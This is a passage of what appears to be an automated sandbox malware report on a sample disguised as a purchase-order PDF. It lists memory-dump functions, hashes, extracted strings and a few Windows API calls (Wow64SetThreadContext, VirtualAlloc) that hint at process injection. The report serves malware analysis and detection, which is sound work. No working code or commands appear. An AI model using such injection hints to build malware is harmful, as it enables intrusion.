                                            • Instruction ID: db422f7933a5015e22fd0467cb10e14d25030513da63b306728efbe409f9950d
                                            • Opcode Fuzzy Hash: c35b4fff939ba01130effcf503bb98e321ceea23f331b7ef7a694fbc7e82ce4e
                                            • Instruction Fuzzy Hash: 353199B4D012489FCF14DFA9D984ADEFBF1BB49310F10942AE819B7210D775A945CF98
                                            Function 0621E0C8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0621E177
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 82bb226f27481f4617613f1f26812d12bab47f0a62656f451f9f3dc7f8e5eafc
                                            • Instruction ID: 5546d1e651916c403a5eb18053dc6b1a7df4050f243913fe98acb876dec8e1e2
                                            • Opcode Fuzzy Hash: 82bb226f27481f4617613f1f26812d12bab47f0a62656f451f9f3dc7f8e5eafc
                                            • Instruction Fuzzy Hash: 2431CDB4D102589FDB10DFAAD884AEEFBF1BF49310F14802AE818B7240D778A985CF54
                                            Function 05F28E71 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq
                                            • API String ID: 0-2474004448
                                            • Opcode ID: 95d62b26210afb0b5fad58d5885748585382cd85bb862370882fbf1c97e52ea0
                                            • Instruction ID: a0b32ce1a77baabf749b3ff63e2b7a7b00d66eed16881911b0881c542384e796
                                            • Opcode Fuzzy Hash: 95d62b26210afb0b5fad58d5885748585382cd85bb862370882fbf1c97e52ea0
                                            • Instruction Fuzzy Hash: 97C14FB4A002288FDB14DF69C945BDDBBF6BF88701F158099E509AB391CB789D81CF61
                                            Function 05F27F98 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: f759d060836b9106acde9e555735a314ed807a2271ab2417565b4513c3371da5
                                            • Instruction ID: f8aaac2dac4f56a36055df9e6775d2497728823063c87085f5d9e85d968a313a
                                            • Opcode Fuzzy Hash: f759d060836b9106acde9e555735a314ed807a2271ab2417565b4513c3371da5
                                            • Instruction Fuzzy Hash: 4DB10A74A10218DFCB08EFA4D89999DBBB2FF88340F558159E506AB365DB34AC42CB90
                                            Function 05F23B50 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pl^q
                                            • API String ID: 0-2831078282
                                            • Opcode ID: 24ebc48ddc67df59390bb1cbf3407acd192e070c666417cca253f08f70c451c1
                                            • Instruction ID: 3c86533432fa3895de22bd694a309d1bc974daf8ea03027fea050b2aff2963f8
                                            • Opcode Fuzzy Hash: 24ebc48ddc67df59390bb1cbf3407acd192e070c666417cca253f08f70c451c1
                                            • Instruction Fuzzy Hash: A79105B4B002188FDB04DF69C484A6A7BF6BF89710B5144A9E506DF3B5DB78EC41CB91
                                            Function 05F5FB30 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq
                                            • API String ID: 0-2474004448
                                            • Opcode ID: 32c01a979ee43995d5ea8e74488738b233319b633a8e681cfb56274bfe187f26
                                            • Instruction ID: ab3eeb9d95370db73bafdbe6df189da463e471d2c09aa5061a27aae02f0e0c97
                                            • Opcode Fuzzy Hash: 32c01a979ee43995d5ea8e74488738b233319b633a8e681cfb56274bfe187f26
                                            • Instruction Fuzzy Hash: D151A1757001158FCB04DF69D894A6EBBE6FF88321B1180B9EA05DB361DB35ED02CBA1
                                            Function 05F2A370 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq
                                            • API String ID: 0-149360118
                                            • Opcode ID: fa17b07b25fdf3857001b43179b24c4077b41fd1b140da7e1eb6201f9543f382
                                            • Instruction ID: e92b8fb464a0361ca7cba8473265de89b04b19c8146b47bd6f033e6c945f9502
                                            • Opcode Fuzzy Hash: fa17b07b25fdf3857001b43179b24c4077b41fd1b140da7e1eb6201f9543f382
                                            • Instruction Fuzzy Hash: 7151E1757081648FDB18DF39C854A6E3BA6BF89700B1584A9F546CB3A1CE7CDD02C7A0
                                            Function 05F5DCA0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: pbq
                                            • API String ID: 0-3896149868
                                            • Opcode ID: ac2e98852dba9922f4c67defa0770c84c71e47195afba2a68b5f134dab8428ff
                                            • Instruction ID: 73bfbdfdb9484464a4a84a07b9ea17f8a083b7a74a5aa0f30738ef0eddf322f8
                                            • Opcode Fuzzy Hash: ac2e98852dba9922f4c67defa0770c84c71e47195afba2a68b5f134dab8428ff
                                            • Instruction Fuzzy Hash: 4E515C76600100AFDB49AFA8D915D297BF7FF8C3147168498E2098B272DA36DC21EB50
                                            Function 05F2BC3A Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: f0b0d5cb6352de7b8dc036082a183d4ec1a112f73ef5afa6d767e19e3c8406f4
                                            • Instruction ID: e30e896b55787eec5a526f39e0b45c4589ea4b8d5c458abbf464380d72fe0198
                                            • Opcode Fuzzy Hash: f0b0d5cb6352de7b8dc036082a183d4ec1a112f73ef5afa6d767e19e3c8406f4
                                            • Instruction Fuzzy Hash: 23418374B116248FCB04FB64C899AAEB7BBEF88700F504419E506AB358DF789D46CBD1
                                            Function 05F2B640 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 9160073ca5e00af5217b1fb6518505f68ba8cb3209806b7877d8bec577f55666
                                            • Instruction ID: af233ac630f2a3d251937d1b8645f528d8a5cf8e54049a5980c341cd774a6935
                                            • Opcode Fuzzy Hash: 9160073ca5e00af5217b1fb6518505f68ba8cb3209806b7877d8bec577f55666
                                            • Instruction Fuzzy Hash: E9416FB57006109FD308DB28C969F2A7BE6AF8C705F114468E60ACF3A2DE75EC42C791
                                            Function 05F2B650 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 7bb5738a94555906580f6bdb77d636359de08bb7cfddcad6619dc63cf38d776d
                                            • Instruction ID: d93a1b09df861fd534be6db984c73b38c36a209e9131fb719aea130eb2c03632
                                            • Opcode Fuzzy Hash: 7bb5738a94555906580f6bdb77d636359de08bb7cfddcad6619dc63cf38d776d
                                            • Instruction Fuzzy Hash: 29314F757006149FD308DB28C8A9F2A77EAAFCC715F104468E60ACB3A1DE75EC42C790
                                            Function 05F27018 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 62d6f8afe7d1b07b68d138260b85cd23a7cccc0fceef4822f20840fb480580db
                                            • Instruction ID: 3781cfad304505bb26ff29843ce9e9a119b25aaee33df15d89636f313e1a846e
                                            • Opcode Fuzzy Hash: 62d6f8afe7d1b07b68d138260b85cd23a7cccc0fceef4822f20840fb480580db
                                            • Instruction Fuzzy Hash: 6131FF75A012049FDF099FA4C855DA9BFB3FF8C311B0540A9E90A9B362DA35DC56CB90
                                            Function 05EE1968 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05EE1A07
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: cd756b798a5c7a58669a6fb135391d200895243afc4f2c56d9c3eb38c1ea075e
                                            • Instruction ID: 5e222a57ae34bfd27fc15c522d2d378bf5474830e613a6a6d58808dec45d1582
                                            • Opcode Fuzzy Hash: cd756b798a5c7a58669a6fb135391d200895243afc4f2c56d9c3eb38c1ea075e
                                            • Instruction Fuzzy Hash: DF3198B4D142489FCF14CFA9D885AEEFBB1FB49310F20A42AE819B7210D735A945CF94
                                            Function 05EE1960 Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05EE1A07
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 0076dbf09362fa1a49cf7d12c4877bf4355fb341c72273a3c40f22a6c64a7508
                                            • Instruction ID: 51963ff5ac4726b42a01d38fe76f2e0d9536156581c8b88f8e98999bd75b4f0a
                                            • Opcode Fuzzy Hash: 0076dbf09362fa1a49cf7d12c4877bf4355fb341c72273a3c40f22a6c64a7508
                                            • Instruction Fuzzy Hash: 2531D9B9D042489FCF14CFA9D980AEEFBB1BF49310F10A01AE819B7250D734A945CF54
                                            Function 05F2CD70 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq
                                            • API String ID: 0-149360118
                                            • Opcode ID: a92c1b9cec81b2d936882f949b274c6ed9fa19f689a001657541a55487b8a41e
                                            • Instruction ID: 363f4c375931f55260f2f78585933860c4b09b101c65461ab684353b94468192
                                            • Opcode Fuzzy Hash: a92c1b9cec81b2d936882f949b274c6ed9fa19f689a001657541a55487b8a41e
                                            • Instruction Fuzzy Hash: 6221D476619260AFCB06CF74D815C597FB6EF8931030580D6E104DB272CA35D911DB61
                                            Function 05F10D7C Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765563723.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f10000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 19df7a03ecba3765678218b1ffb310b60463790a5616fd8d77a81965f32abba6
                                            • Instruction ID: a4d524cb70ede000ac9d771754480fe54d39e3cf0b785d20127cc65e13eca36d
                                            • Opcode Fuzzy Hash: 19df7a03ecba3765678218b1ffb310b60463790a5616fd8d77a81965f32abba6
                                            • Instruction Fuzzy Hash: 88319E39D08209CFDB18CFA9D519BBEBBB6FB44301F00806AD511A7281CB3C5A86CF95
                                            Function 05F22740 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: p<^q
                                            • API String ID: 0-1680888324
                                            • Opcode ID: 5e81d28dc0af2d7fc1047ef50f519fb37734c1b87162c714adf22ab4ae08b65b
                                            • Instruction ID: 109a727558c08270b9db4767e0010ff218a31463387c3ed2501b634a644e511b
                                            • Opcode Fuzzy Hash: 5e81d28dc0af2d7fc1047ef50f519fb37734c1b87162c714adf22ab4ae08b65b
                                            • Instruction Fuzzy Hash: BE216AB93081649FCB01CF2AC840EAA7BEABF89250F054495FC05CB2B1DA39DC50CB60
                                            Function 05F22730 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: p<^q
                                            • API String ID: 0-1680888324
                                            • Opcode ID: 10be198027014ccb10aad164be516758ba64c8eb35c09775e1101c38c80c36d9
                                            • Instruction ID: 24d4d7f0219e9676a8bb4678307b94f082865c33faf63b5e5adffac2237a3997
                                            • Opcode Fuzzy Hash: 10be198027014ccb10aad164be516758ba64c8eb35c09775e1101c38c80c36d9
                                            • Instruction Fuzzy Hash: A0218EB97082549FCB15CF29D854EAA7BEABF8D211B054496FC46CB3B1DA38DC50CB20
                                            Function 05F5C238 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l
                                            • API String ID: 0-2517025534
                                            • Opcode ID: 721eb14129e17c4f073d9d33c8fa9a40ff168b9d0a4d50ef8e2d0f39ea6eeded
                                            • Instruction ID: 31e3bb123add6f46818e351082fabc0309a47ec3cf75f127f98605b6d64a23c9
                                            • Opcode Fuzzy Hash: 721eb14129e17c4f073d9d33c8fa9a40ff168b9d0a4d50ef8e2d0f39ea6eeded
                                            • Instruction Fuzzy Hash: 1B1160B6D192448BD3019BAAD8132A5BBF4AFA2611F2854D7CD89C7362E5348D49CB82
                                            Function 011809E4 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: b13d9aa945868ab934246b3b6a3b1c481ea04c440bfd249c6e045b7b0da81990
                                            • Instruction ID: b1d1b90016258dd9700cc7201d35f45c23fba2dc6e9d55588bb46f72a65f7095
                                            • Opcode Fuzzy Hash: b13d9aa945868ab934246b3b6a3b1c481ea04c440bfd249c6e045b7b0da81990
                                            • Instruction Fuzzy Hash: 13118B70B001099FC708EF69D598BADBBF2AF8C710F254469E405EB3A1CB708D04CB80
                                            Function 061FBEAA Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?
                                            • API String ID: 0-1684325040
                                            • Opcode ID: 2a4efdf85b09c6bc0d12217abd4cad042fb1f1d9e7c28629ef77c3def23aaa28
                                            • Instruction ID: f438aba672774a83bfd071dae1881b6457be3a6a50ae4e08470cb437add927b9
                                            • Opcode Fuzzy Hash: 2a4efdf85b09c6bc0d12217abd4cad042fb1f1d9e7c28629ef77c3def23aaa28
                                            • Instruction Fuzzy Hash: 341115B0D04219CFDBA4DF14C994BE9B7F5BB09304F5085EAC519A7241DB759A86CF00
                                            Function 061FC022 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C
                                            • API String ID: 0-1037565863
                                            • Opcode ID: f6ce10d502ec59d2e555a49cf71919cae7ace2071395ede5e7408e19af397434
                                            • Instruction ID: 04bbfbaa054ec0ffb1d23aee6a48814469644045bc86c0cf7ef78edaf528c275
                                            • Opcode Fuzzy Hash: f6ce10d502ec59d2e555a49cf71919cae7ace2071395ede5e7408e19af397434
                                            • Instruction Fuzzy Hash: E8119DB4D0426DCFDB64CFA4D984BEDBBB5BB49304F0094E99919A7204D7359A82CF90
                                            Function 063A0FD8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: y
                                            • API String ID: 0-4225443349
                                            • Opcode ID: ed361afa22060a0db8077a83cb6bbffab57bed5c5d0643580e18ab675177844d
                                            • Instruction ID: fabfa1a2ea921952ebf8d11af9064e9737d51f176dd3282fbf0f44cdfeefe46b
                                            • Opcode Fuzzy Hash: ed361afa22060a0db8077a83cb6bbffab57bed5c5d0643580e18ab675177844d
                                            • Instruction Fuzzy Hash: 3E111B74A06129CFDBA4DF68C888B99B7B5EB08308F1080E5D05DA3744DB349EC4DF41
                                            Function 061FBC78 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: )
                                            • API String ID: 0-2427484129
                                            • Opcode ID: c6c2eef37f66120458ce559fc630fd944298fdabac9b4e96529db39dc39fbb6c
                                            • Instruction ID: f744622fa7d5a942283394d898eca1b23faafc62bfa679664530a6142892da98
                                            • Opcode Fuzzy Hash: c6c2eef37f66120458ce559fc630fd944298fdabac9b4e96529db39dc39fbb6c
                                            • Instruction Fuzzy Hash: 08F0FFB0D1622ECFEBA0DF14CA48B9AB7F1BB05304F0184D9C10DA3240DBBA4AC58F00
                                            Function 061FB9A7 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A
                                            • API String ID: 0-3554254475
                                            • Opcode ID: 3b52d1a135ed8a588616444e4dc35565097222dca295722e4ef145a65327c7fc
                                            • Instruction ID: 0323c327c888bdb8ff5a3643215d883b0a85cbf4e76c76a00d4b262dfe4e5bb4
                                            • Opcode Fuzzy Hash: 3b52d1a135ed8a588616444e4dc35565097222dca295722e4ef145a65327c7fc
                                            • Instruction Fuzzy Hash: F4F0DFB4A01228AFDB60DF60D868BCDBBB1BB08300F1080D9E609A3244DB355FC08F00
                                            Function 05F5AF34 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: d37574ed67f93e18cc98894e6aef84b337cccf08c28cdaa6967502ad67fa2623
                                            • Instruction ID: ac877ebb3630e9820245a7011f17e54efc2f844b851be08e0e735cb627497562
                                            • Opcode Fuzzy Hash: d37574ed67f93e18cc98894e6aef84b337cccf08c28cdaa6967502ad67fa2623
                                            • Instruction Fuzzy Hash: 9AF0F874E0522C8FCB14EF24D98079EBBB2BB48304F1041D59809A7345D7345F84CF42
                                            Function 061FB094 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7
                                            • API String ID: 0-1790921346
                                            • Opcode ID: 2398f873c9d77ed251e524b44e73c329c9298d72b84b2ea2c37e6161b6febda6
                                            • Instruction ID: bafa56c9d57a2d8d2ec6eda857c5188e0e2dc2c91fd5e043b00f3b888d0079d4
                                            • Opcode Fuzzy Hash: 2398f873c9d77ed251e524b44e73c329c9298d72b84b2ea2c37e6161b6febda6
                                            • Instruction Fuzzy Hash: AEF0C974904259CFDB50DF10C994B9DB7B1BB05354F1484D9D409A3244D73A9B82CF40
                                            Function 05F57157 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !
                                            • API String ID: 0-2657877971
                                            • Opcode ID: 4ccd82c09baae6c9c8f15da9639899e4d0709b59dcd0ea1a4f8e7d3e532eb355
                                            • Instruction ID: 0eafdc68815a495dfd9c8b4f68730e553e5dedad08d3f5b864251fd907452cbc
                                            • Opcode Fuzzy Hash: 4ccd82c09baae6c9c8f15da9639899e4d0709b59dcd0ea1a4f8e7d3e532eb355
                                            • Instruction Fuzzy Hash: ACE0EC74815628CBDF65CF54C94CBDEBBB6BB14316F0092D9D509631A4D7B80AC8CF01
                                            Function 05F542E5 Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !
                                            • API String ID: 0-2657877971
                                            • Opcode ID: 37bf9404e9b0e4c375c1360915f838bdbde84a2b6830293324feb4bb0652427e
                                            • Instruction ID: 77a6d5a56bfc2db3416899007e5202a2f9efdbebde4246aa3824b09d6c164075
                                            • Opcode Fuzzy Hash: 37bf9404e9b0e4c375c1360915f838bdbde84a2b6830293324feb4bb0652427e
                                            • Instruction Fuzzy Hash: 0BD0C9748056288FDB90DF24C958B8EBBB5FB14306F0056D5D409A3164EB701EC4CF01
                                            Function 05F2BE88 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60fe4ced92b2613bb55062c58001390743c8b433da0f930cc76e7cb12171378b
                                            • Instruction ID: 17eca31558e08f0602ef0687d8ea92db57faadc8c52be3bf89678129a2c54221
                                            • Opcode Fuzzy Hash: 60fe4ced92b2613bb55062c58001390743c8b433da0f930cc76e7cb12171378b
                                            • Instruction Fuzzy Hash: 3B12FA74B102288FCB14EF64C894AADB7B2BF89300F5185A9E54AAB355DF34ED85CF50
                                            Function 05F2BE78 Relevance: .2, Instructions: 235COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86d3e1985f06fb4332b9269450d405d72316aef07b86423db89fb9e3224c411a
                                            • Instruction ID: 7e319c7a28fb06110f6c035565e2db0ee089ded3d385384e34dbd6c5fbab1a8c
                                            • Opcode Fuzzy Hash: 86d3e1985f06fb4332b9269450d405d72316aef07b86423db89fb9e3224c411a
